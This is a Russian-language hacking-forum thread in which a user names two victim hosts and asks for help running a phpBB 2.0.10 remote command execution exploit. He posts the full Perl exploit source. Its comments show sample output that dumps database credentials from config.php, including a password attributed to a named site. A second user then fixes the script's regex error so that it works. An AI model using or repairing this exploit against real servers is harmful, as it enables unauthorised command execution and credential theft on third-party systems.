phpBB 2.0.10 EXPLOIT

Discussion in 'Песочница' started by nodead1, 26 Dec 2010.

  1. nodead1

    nodead1 New Member

    Joined:
    10 Apr 2010
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Вот такая проблема:

    [​IMG]

    Решил получить доступ к админке читал читал ну и решил скачать эксплоит. эксплоид я создал сначало в текстовом редакторе (txt) потом через него сохранил эксплоит в .pl в UTF-8
    не знаю правильно я сделал или нет тк как делать правельно я не знаю.... ( =l )

    -------------------------------------
    http://thebestkill.no-ip.biz/ Жертва
    http://91.146.44.8/ Жертва
    -------------------------------------

    потом скачал perl указал все вроде правельно а у меня ошибка

    Perl phpBB2010.pl http://thebestkill.no-ip.org /forum/ 12 ls

    perl - мой перл

    phpBB2010.pl - мой эксплоид

    http://thebestkill.no-ip.org - жертва

    /forum/ - деректория

    12 - топик

    ls - хз

    также пытался через
    Perl phpBB2010.pl http://91.146.44.8 /forum/ 12 ls

    тоже неудача

    возможно это потому что я создал не правельно эксплоид?
     
    #1 nodead1, 26 Dec 2010
    Last edited: 26 Dec 2010
    1 person likes this.
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    кинь исходник сплоита!
    а вообще я так слегка подозреваю что этот-->

    phpBB <= 2.0.10 remote commands exec exploit
     
  3. nodead1

    nodead1 New Member

    Joined:
    10 Apr 2010
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Code:
    3#!/usr/bin/perl 
    
    use IO::Socket; 
    
    ##                     @@@@@@@   @@@  @@@   @@@@@@  @@@  @@@ 
    ##                     @@!  @@@  @@!  @@@  !@@      @@!  @@@ 
    ##                     @!@!!@!   @!@  !@!   !@@!!   @!@!@!@! 
    ##                     !!: :!!   !!:  !!!      !:!  !!:  !!! 
    ##                      :   : :   :.:: :   ::.: :    :   : : 
    ## 
    ## phpBB <= 2.0.10 remote commands exec exploit 
    ## based on [url]http://securityfocus.com/archive/1/80993/2004-11-07/2004-11-13/0[/url] 
    ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    ## example... 
    ## he-he-he ... read [url]http://www.phpbb.com/phpBB/viewtopic.php?t=239819[/url] 
    ## The third issue, search highlighting, has been checked by us several times and we can do  
    ## nothing with it at all. Again, that particular group admit likewise. In a future release  
    ## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our  
    ## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to  
    ## be cause for an immediate release. 
    ## heh... 
    ## 
    ## r57phpbb2010.pl [url]www.phpbb.com[/url] /phpBB/ 239819 "ls -la" 
    ## *** CMD: [ ls -la ] 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    ##   total 507 
    ##   drwxr-xr-x   12 dhn      phpbb         896 Oct 13 18:23 . 
    ##   drwxrwxr-x   19 root     phpbb        1112 Nov 12 15:08 .. 
    ##   drwxr-xr-x    2 dhn      phpbb         152 Oct 13 18:23 CVS 
    ##   drwxr-xr-x    3 dhn      phpbb         944 Jul 19 15:17 admin 
    ##   drwxrwxrwx    5 dhn      phpbb         160 Aug 14 21:19 cache 
    ##   -rw-r--r--    1 dhn      phpbb       44413 Mar 11  2004 catdb.php 
    ##   -rw-r--r--    1 dhn      phpbb        5798 Jul 19 15:17 common.php 
    ##   -rw-r--r--    1 root     root          264 Jul  2 08:05 config.php 
    ##   drwxr-xr-x    3 dhn      phpbb         136 Jun 24 06:40 db 
    ##   drwxr-xr-x    3 dhn      phpbb         320 Jul 19 15:17 docs 
    ##   -rw-r--r--    1 dhn      phpbb         814 Oct 30  2003 extension.inc 
    ##   -rw-r--r--    1 dhn      phpbb        3646 Jul 10 04:21 faq.php 
    ##   drwxr-xr-x    2 dhn      phpbb          96 Aug 12 14:59 files 
    ##   -rw-r--r--    1 dhn      phpbb       45642 Jul 12 12:42 groupcp.php 
    ##   drwxr-xr-x    7 dhn      phpbb         240 Aug 12 16:22 images 
    ##   drwxr-xr-x    3 dhn      phpbb        1048 Jul 19 15:17 includes 
    ##   -rw-r--r--    1 dhn      phpbb       14518 Jul 10 04:21 index.php 
    ##   drwxr-xr-x   60 dhn      phpbb        2008 Sep 27 01:54 language 
    ##   -rw-r--r--    1 dhn      phpbb        7481 Jul 19 15:17 login.php 
    ##   -rw-r--r--    1 dhn      phpbb       12321 Mar  4  2004 memberlist.php 
    ##   -rw-r--r--    1 dhn      phpbb       37639 Jul 10 04:21 modcp.php 
    ##   -rw-r--r--    1 dhn      phpbb       45945 Mar 24  2004 mods_manager.php 
    ##   -rw-r--r--    1 dhn      phpbb       34447 Jul 10 04:21 posting.php 
    ##   -rw-r--r--    1 dhn      phpbb       72580 Jul 10 04:21 privmsg.php 
    ##   -rw-r--r--    1 dhn      phpbb        4190 Jul 12 12:42 profile.php 
    ##   -rw-r--r--    1 dhn      phpbb       16276 Oct 13 18:23 rules.php 
    ##   -rw-r--r--    1 dhn      phpbb       42694 Jul 19 15:17 search.php 
    ##   drwxr-xr-x    4 dhn      phpbb         136 Jun 24 06:41 templates 
    ##   -rw-r--r--    1 dhn      phpbb       23151 Mar 13  2004 viewforum.php 
    ##   -rw-r--r--    1 dhn      phpbb        7237 Jul 10 04:21 viewonline.php 
    ##   -rw-r--r--    1 dhn      phpbb       45151 Jul 10 04:21 viewtopic.php 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    ## r57phpbb2010.pl [url]www.phpbb.com[/url] /phpBB/ 239819 "cat config.php" 
    ## *** CMD: [ cat config.php ] 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    ##   $dbms = "mysql"; 
    ##   $dbhost = "localhost"; 
    ##   $dbname = "phpbb"; 
    ##   $dbuser = "phpbb"; 
    ##   $dbpasswd = "phpBB_R0cKs"; 
    ##   $table_prefix = "phpbb_"; 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    ## rocksss....  
    ## 
    ## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam... 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    ## fucking lamaz... 
    ## 
    ## ccteam.ru 
    ## $dbname   = "ccteam_phpbb2"; 
    ## $dbuser   = "ccteam_userphpbb"; 
    ## $dbpasswd = "XCbRsoy1"; 
    ## 
    ## eat this dude... 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    
    if (@ARGV < 4) 
     { 
     print q(############################################################ 
         phpBB <=2.0.10 remote command execution exploit 
            by RusH security team // [url]www.rst.void.ru[/url] 
    ############################################################ 
     usage: 
     r57phpbb2010.pl [url] [DIR] [NUM] [CMD] 
     params: 
      [url] - server url e.g. www.phpbb.com 
      [DIR] - directory where phpBB installed e.g. /phpBB/ or / 
      [NUM] - number of existing topic 
      [CMD] - command for execute e.g. ls or "ls -la"  
    ############################################################ 
     );    
     exit; 
     } 
    
    $serv  = $ARGV[0]; 
    $dir   = $ARGV[1]; 
    $topic = $ARGV[2]; 
    $cmd   = $ARGV[3]; 
    
    $serv =~ s/(http://)//eg; 
    print "*** CMD: [ $cmd ]\r\n"; 
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
    
    $cmd=~ s/(.*);$/$1/eg; 
    $cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; 
    $topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; 
    
    $path  = $dir; 
    $path .= 'viewtopic.php?t='; 
    $path .= $topic; 
    $path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20'; 
    $path .= $cmd; 
    $path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'; 
    $path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; 
    
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n"; 
    
    print $socket "GET $path HTTP/1.1\n"; 
    print $socket "Host: $serv\n"; 
    print $socket "Accept: */*\n"; 
    print $socket "Connection: close\n\n"; 
    
    $on = 0; 
    
    while ($answer = <$socket>) 
    { 
    if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); } 
    if ($on == 1) { print "  $answer"; } 
    if ($answer =~ /^_START_/) { $on = 1; } 
    } 
    
    print "[-] EXPLOIT FAILED\r\n"; 
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
    
    ### EOF ### 
    
    # milw0rm.com [2004-11-22]
     
    #3 nodead1, 26 Dec 2010
    Last edited by a moderator: 26 Dec 2010
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://thebestkill.no-ip.org лежит твоя жертва) нет возможности проверить...
     
  5. nodead1

    nodead1 New Member

    Joined:
    10 Apr 2010
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    сейчас попробуй
    как я понял не лежит только вечером
     
  6. nodead1

    nodead1 New Member

    Joined:
    10 Apr 2010
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    up/////
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    в твоем сплоите в 107 ошибка в ней прописано "$serv =~ s/(http://)//eg;" а должно быть "$serv =~ s/(http:\/\/)//eg; " после этой замены все робит
     
    _________________________
  8. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Анти скрипткиддис.